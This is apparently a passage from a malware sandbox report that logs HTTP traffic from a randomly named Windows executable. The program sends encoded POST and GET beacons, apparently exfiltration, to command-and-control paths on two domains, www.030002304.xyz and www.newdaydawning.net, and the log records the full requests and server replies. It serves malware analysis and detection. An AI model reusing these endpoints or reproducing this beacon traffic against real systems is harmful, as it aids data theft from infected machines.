                                                    Data Ascii: 8T2hn=1veu06OtMkxu8OnZ7u6IEoSTQgQRewFmi1ywDwbRDcc6yaHKMkIYYME7ugFMUAbo6NZng9lwXcP+73CnQIfuom+Sa6VJXD3BZ0oOvd87wtvgIz0XeXWZ4MvZsxzggHjjg7VjH+cts13wFwZ7Hqx+c57S59q4BaODo6EaBBDqIa+oDhy/4T5bSw9fOZ80sl5/k/4KAODBt7VGGx3hEA==
                                                     Oct 9, 2024 14:02:18.896882057 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Wed, 09 Oct 2024 12:02:18 GMT
                                                    vary: User-Agent
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     3 | 192.168.2.9 | 49983 | 65.21.196.90 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Oct 9, 2024 14:02:20.795475006 CEST | 1815 | OUT | POST /6uay/ HTTP/1.1
                                                    Host: www.030002304.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.030002304.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1230
                                                    Cache-Control: no-cache
                                                    Referer: http://www.030002304.xyz/6uay/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 31 76 65 75 30 36 4f 74 4d 6b 78 75 38 4f 6e 5a 37 75 36 49 45 6f 53 54 51 67 51 52 65 77 46 6d 69 31 79 77 44 77 62 52 44 64 6b 36 79 6f 2f 4b 4e 48 77 59 4b 63 45 37 74 67 46 52 55 41 62 50 36 4c 78 6a 67 39 70 4b 58 5a 4c 2b 36 53 57 6e 41 74 6a 75 6d 6d 2b 53 59 36 56 4b 54 44 33 55 5a 30 34 4b 76 64 73 37 77 74 76 67 49 79 45 58 58 6c 2b 5a 30 73 76 59 6b 52 7a 73 32 48 69 30 67 37 39 7a 48 2f 6f 54 73 6c 58 77 63 51 4a 37 46 34 70 2b 61 70 37 55 34 39 71 67 42 61 53 71 6f 35 68 32 42 42 66 41 49 5a 65 6f 42 30 76 54 37 79 35 57 52 67 35 51 50 5a 67 51 69 56 68 57 6b 63 45 50 52 38 62 7a 31 2b 77 73 4b 53 79 4c 48 4e 68 75 6b 38 75 4f 37 6e 73 37 6b 6f 6b 35 4a 2b 42 46 37 75 57 48 5a 6c 45 78 79 6d 65 6e 4d 68 6a 67 75 6c 63 45 49 77 76 65 37 45 32 2b 41 42 6a 64 78 38 55 4c 41 73 70 69 6b 55 62 4f 6b 47 57 4a 6c 36 6e 4b 68 75 73 41 64 5a 45 52 51 46 31 54 68 47 4c 54 2f 30 46 79 6e 51 75 30 63 47 4c 65 36 75 7a 4e 76 58 5a 33 79 56 51 6c 56 36 76 43 6d 38 52 61 53 56 65 31 [TRUNCATED]
                                                    Data Ascii: 8T2hn=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 [TRUNCATED]
                                                     Oct 9, 2024 14:02:21.471190929 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Wed, 09 Oct 2024 12:02:21 GMT
                                                    vary: User-Agent
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     4 | 192.168.2.9 | 49984 | 65.21.196.90 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Oct 9, 2024 14:02:23.339941025 CEST | 513 | OUT | GET /6uay/?8T2hn=4t2O3O+pZmQg6Me57d3wJo6heDIGdjpowWW3Ki6AModP/Z3yDnI8KOs9thhsa1jg844M9/RLYM/vwhOiRdypu3qnYIwYUCnWcXg0sNwBl87ACBA0Bg==&wZBh=UzoT8ph HTTP/1.1
                                                    Host: www.030002304.xyz
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                     Oct 9, 2024 14:02:23.989788055 CEST | 1032 | IN | HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Wed, 09 Oct 2024 12:02:23 GMT
                                                    vary: User-Agent
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     5 | 192.168.2.9 | 49985 | 44.213.25.70 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Oct 9, 2024 14:02:29.183646917 CEST | 790 | OUT | POST /igaf/ HTTP/1.1
                                                    Host: www.newdaydawning.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.newdaydawning.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 194
                                                    Cache-Control: no-cache
                                                    Referer: http://www.newdaydawning.net/igaf/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 2b 35 42 37 38 31 51 73 38 75 66 69 65 61 63 63 54 65 51 4b 34 75 68 46 64 52 49 48 4a 46 66 61 59 50 6e 71 31 37 4e 59 46 65 45 6f 6b 4f 54 2b 68 6a 49 56 4d 4a 4f 72 38 4b 77 65 7a 72 43 57 48 53 77 51 70 4d 68 58 70 37 75 72 58 6f 54 6b 2f 5a 77 77 51 50 4b 57 6c 2f 4c 6a 33 4c 6a 49 36 37 78 76 6c 43 76 33 75 54 75 45 6a 69 43 46 54 32 55 63 78 32 71 34 5a 71 2f 68 47 6e 6b 73 66 6b 71 72 33 67 70 4e 6e 30 41 69 65 54 61 42 69 65 74 36 4f 39 6c 47 78 44 51 43 50 55 79 48 54 6b 68 4e 62 70 63 56 75 37 30 77 4c 37 47 33 41 31 59 32 76 48 72 69 43 76 79 59
                                                    Data Ascii: 8T2hn=+5B781Qs8ufieaccTeQK4uhFdRIHJFfaYPnq17NYFeEokOT+hjIVMJOr8KwezrCWHSwQpMhXp7urXoTk/ZwwQPKWl/Lj3LjI67xvlCv3uTuEjiCFT2Ucx2q4Zq/hGnksfkqr3gpNn0AieTaBiet6O9lGxDQCPUyHTkhNbpcVu70wL7G3A1Y2vHriCvyY


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     6 | 192.168.2.9 | 49986 | 44.213.25.70 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Oct 9, 2024 14:02:31.733153105 CEST | 814 | OUT | POST /igaf/ HTTP/1.1
                                                    Host: www.newdaydawning.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.newdaydawning.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 218
                                                    Cache-Control: no-cache
                                                    Referer: http://www.newdaydawning.net/igaf/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Data Raw: 38 54 32 68 6e 3d 2b 35 42 37 38 31 51 73 38 75 66 69 66 2b 59 63 52 35 6b 4b 35 4f 68 45 42 68 49 48 65 56 66 65 59 50 6a 71 31 36 4a 49 45 73 77 6f 6b 75 6a 2b 67 6e 6b 56 63 5a 4f 72 79 71 77 62 73 37 43 64 48 53 38 70 70 4a 42 58 70 37 71 72 58 6f 6a 6b 2f 6f 77 7a 52 66 4b 55 39 50 4c 6c 34 72 6a 49 36 37 78 76 6c 43 72 4e 75 54 47 45 6a 78 61 46 42 54 30 54 71 57 71 35 50 36 2f 68 58 58 6b 6f 66 6b 71 7a 33 6b 4a 7a 6e 32 34 69 65 53 71 42 69 50 74 35 46 39 6c 45 76 44 52 7a 43 6d 50 6a 63 45 68 75 59 35 34 4c 77 59 34 41 49 61 6d 70 52 48 52 74 36 51 72 46 46 49 37 77 50 78 41 45 6f 64 74 31 73 6e 37 2f 4d 61 63 32 51 66 39 57 6d 41 3d 3d
                                                    Data Ascii: 8T2hn=+5B781Qs8ufif+YcR5kK5OhEBhIHeVfeYPjq16JIEswokuj+gnkVcZOryqwbs7CdHS8ppJBXp7qrXojk/owzRfKU9PLl4rjI67xvlCrNuTGEjxaFBT0TqWq5P6/hXXkofkqz3kJzn24ieSqBiPt5F9lEvDRzCmPjcEhuY54LwY4AIampRHRt6QrFFI7wPxAEodt1sn7/Mac2Qf9WmA==
                                                     Oct 9, 2024 14:02:33.063723087 CEST | 495 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:02:32 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 32 64 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 0d 0a 35 31 0d 0a 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                                    Data Ascii: 16<!doctype html><html 2dlang="en-US" prefix="og: https://ogp.me/ns#" 51><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
                                                     Oct 9, 2024 14:02:33.064151049 CEST | 1236 | IN | Data Raw: 61 31 65 0d 0a 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22
                                                    Data Ascii: a1eUTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><script type="text/javascript">window.flatStyles = window.flatStyles || ''window.lightspeedOptimizeStylesheet = function () {const currentSt
                                                     Oct 9, 2024 14:02:33.064189911 CEST | 1236 | IN | Data Raw: 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 0a 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 66 6c 61 74 53 74 79 6c 65 73 20 2b 3d 20 63 75 72 72 65 6e 74 53 74 79
                                                    Data Ascii: setAttribute( 'data-ls-optimized', '1' )window.flatStyles += currentStylesheet.innerHTMLthis.optimizing = false}} else {window.flatStyles = currentStylesheet.innerHTMLcurrentStylesheet.s
                                                     Oct 9, 2024 14:02:33.064203024 CEST | 125 | IN | Data Raw: 65 6d 65 6e 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 74 61 67 4e 61 6d 65 20 21 3d 3d 20 27 48 45 41 44 27 20 29 20 7b 0a 09 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 20 73 74 79 6c 65 53 68 65 65 74 45
                                                    Data Ascii: ement.parentElement.tagName !== 'HEAD' ) {document.head.append( styleSheetElement )}}}</script>
                                                     Oct 9, 2024 14:02:33.083913088 CEST | 1236 | IN | Data Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 74 63 62 2d 73 74 79 6c 65 2d 62 61 73 65 2d 74 68 72 69 76 65 5f 74 65 6d 70 6c 61 74 65 2d 32 31 39 22 20 20 6f 6e 4c 6f 61 64 3d 22 74 79 70 65
                                                    Data Ascii: 1f40<style type="text/css" id="tcb-style-base-thrive_template-219" onLoad="typeof window.lightspeedOptimizeStylesheet === 'function' && window.lightspeedOptimizeStylesheet()" class="tcb-lightspeed-style">.thrv_widget_menu{position:relative;
                                                     Oct 9, 2024 14:02:33.083950996 CEST | 1236 | IN | Data Raw: 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 2d 74 72 69 67 67 65 72 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77
                                                    Data Ascii: -item-dropdown-trigger:not(:empty){margin-left:8px;}.tve-m-trigger{display:none;-webkit-tap-highlight-color:transparent;}.tve-m-trigger:focus,.tve-m-trigger:active{outline:none;}.tve-m-trigger .thrv_icon{font-size:33px;width:33px;height:33px;m
                                                     Oct 9, 2024 14:02:33.083964109 CEST | 1236 | IN | Data Raw: 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68
                                                    Data Ascii: apper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu li{background-color:inherit;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu ul{display:none;position:relative;width:100%;left:0px;top:0px;}.thrv_wi
                                                     Oct 9, 2024 14:02:33.084068060 CEST | 1236 | IN | Data Raw: 32 35 35 29 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 5b 63 6c 61 73 73 2a
                                                    Data Ascii: 255);}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="light-tmp"] ul.tve_w_menu .sub-menu{box-shadow:none;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="light-tmp"] ul.tve_w_menu li
                                                     Oct 9, 2024 14:02:33.084079981 CEST | 1236 | IN | Data Raw: 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 64 72 6f 70 64 6f 77 6e 20 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 70 6f
                                                    Data Ascii: apper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger{position:relative;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger .thrv_icon{display:block;transition:opa
                                                     Oct 9, 2024 14:02:33.084090948 CEST | 1120 | IN | Data Raw: 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 73 69 64 65 2d 72 69 67 68 74 20
                                                    Data Ascii: et_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-side-right ul.tve_w_menu::-webkit-scrollbar,.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-side-left ul.tve_w_menu::-webkit-scrollbar,.thr
                                                    Oct 9, 2024 14:02:33.084295034 CEST1236INData Raw: 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 73 69 64 65 2d 66 75 6c 6c 73 63 72 65 65 6e 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61
                                                    Data Ascii: tom-menu-switch-icon-"].tve-mobile-side-fullscreen ul.tve_w_menu::-webkit-scrollbar-thumb{height:23px;border:4px solid rgba(0,0,0,0);background-clip:padding-box;border-radius:7px;background-color:rgba(0,0,0,0.15);box-shadow:rgba(0,0,0,0.05) -1


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.9 | 49987 | 44.213.25.70 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 9, 2024 14:02:34.282876015 CEST | 1827 | OUT | POST /igaf/ HTTP/1.1
                                                    Host: www.newdaydawning.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.newdaydawning.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1230
                                                    Cache-Control: no-cache
                                                    Referer: http://www.newdaydawning.net/igaf/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Oct 9, 2024 14:02:35.483587980 CEST | 489 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 09 Oct 2024 12:02:34 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.9 | 49988 | 44.213.25.70 | 80 | 6280 | C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Oct 9, 2024 14:02:36.824409008 CEST | 517 | OUT | GET /igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeths6OaqB6aU1oO66EyRWu95qtLC+XaCQo95JR9SCocHD8In7sYhzsBDy4zub0g2aDA== HTTP/1.1
                                                    Host: www.newdaydawning.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
                                                    Oct 9, 2024 14:02:37.982923985 CEST | 471 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Wed, 09 Oct 2024 12:02:37 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Location: http://newdaydawning.net/igaf/?wZBh=UzoT8ph&8T2hn=z7pb/AVrgdjheaZEOJkK38wzdFwtWkfwIJb37ItQC6dYo/jeths6OaqB6aU1oO66EyRWu95qtLC+XaCQo95JR9SCocHD8In7sYhzsBDy4zub0g2aDA==
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Oct 9, 2024 14:02:38.003098011 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
